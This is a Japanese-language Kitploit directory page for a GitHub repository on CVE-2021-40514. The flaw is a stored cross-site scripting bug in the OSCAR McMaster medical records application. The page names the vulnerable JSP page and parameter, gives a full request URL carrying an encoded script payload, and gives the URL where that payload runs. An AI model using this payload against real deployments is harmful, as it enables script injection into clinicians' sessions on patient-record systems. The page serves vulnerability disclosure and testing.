Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-40514 — CVE-2021-40514 OSCAR McMaster 19.40~1235 保存型クロスサイトスクリプティング脆弱性 | Kitploit
ツール/GitHubGitHub/war4uthor/cve-2021-40514
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubwar4uthor/cve-2021-40514

CVE-2021-40514

CVE-2021-40514 OSCAR McMaster 19.40~1235 保存型クロスサイトスクリプティング脆弱性

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-40514 OSCAR McMaster 19.40~1235 保存型クロスサイトスクリプティングの脆弱性

OSCAR McMasterアプリケーションのバージョン19.40~1235の複数のページに保存型クロスサイトスクリプティングの脆弱性が存在し、任意のJavaScriptコマンドの実行を可能にします。

[CVE mitreのプレースホルダー]

脆弱なJSPページ:

providercontrol.jsp - mygroupnoパラメータ

脆弱なペイロードの例:

/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0

保存されたレスポンスは、以下のリンクでユーザーに対して実行されます:

/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth

発見者: Jack McBride, 2021年8月

ツールをダウンロード